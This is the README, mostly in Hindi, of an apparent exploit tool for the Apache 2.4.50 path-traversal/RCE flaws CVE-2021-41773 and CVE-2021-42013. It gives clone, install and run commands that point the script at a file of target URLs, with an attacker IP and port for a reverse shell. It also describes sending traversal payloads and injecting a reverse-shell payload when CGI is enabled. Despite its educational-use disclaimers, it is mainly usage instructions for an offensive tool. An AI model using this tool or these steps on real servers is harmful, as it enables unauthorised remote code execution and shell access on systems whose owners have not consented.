
Apache-HTTP-Server-2.4.50-RCE यह टूल Apache सर्वरों में CVE-2021-41773 / CVE-2021-42013 भेद्यता का परीक्षण करने के लिए डिज़ाइन किया गया है। यह केवल शैक्षिक उद्देश्यों के लिए है और इसका उपयोग केवल उन प्रणालियों पर जिम्मेदारी से किया जाना चाहिए जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है।
यह टूल Apache सर्वरों में CVE-2021-41773 / CVE-2021-42013 भेद्यता की जाँच करने के लिए डिज़ाइन किया गया है। यह केवल शैक्षिक उद्देश्यों के लिए है और इसका उपयोग केवल उन सिस्टमों पर जिम्मेदारी से किया जाना चाहिए जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति हो।
git clone https://github.com/Zyx2440/Apache-HTTP-Server-2.4.50-RCE.git
cd Apache-HTTP-Server-2.4.50-RCE
pip3 install requests~=2.27.1 termcolor~=1.1.0
pip3 install -r add_requirements.txt
python3 50512.py target.txt -ip <YourIp> -port <ThePort>
the text file should contain the url of the target
python3 50512.py target.txt -ip 10.0.2.15 -port 4444



Apache संस्करण जाँच: प्रदान की गई फ़ाइल में प्रत्येक URL के लिए, यह जाँचता है कि सर्वर Apache संस्करण 2.4.50 चला रहा है या नहीं।
यदि सर्वर भेद्य है: यह पेलोड भेजकर सर्वर का शोषण करने का प्रयास करता है, जिससे या तो डायरेक्टरी ट्रैवर्सल हमले ट्रिगर होते हैं या रिमोट रूप से कोड निष्पादित होता है। यदि CGI सक्षम है: यह रिमोट एक्सेस प्राप्त करने के लिए रिवर्स शेल पेलोड इंजेक्ट करने का प्रयास करता है।
केवल शैक्षिक उपयोग के लिए: यह स्क्रिप्ट शैक्षिक उद्देश्यों के लिए है, ताकि यह दिखाया जा सके कि भेद्यताओं का परीक्षण और शोषण कैसे किया जा सकता है। अनधिकृत लक्ष्यों के विरुद्ध इस स्क्रिप्ट का उपयोग करना अवैध और अनैतिक है।
संशोधन का उद्देश्य: अतिरिक्त त्रुटि प्रबंधन जोड़ा गया और पेलोड लॉजिक तथा RCE को अनुकूलित किया गया और CVE हटाया गया।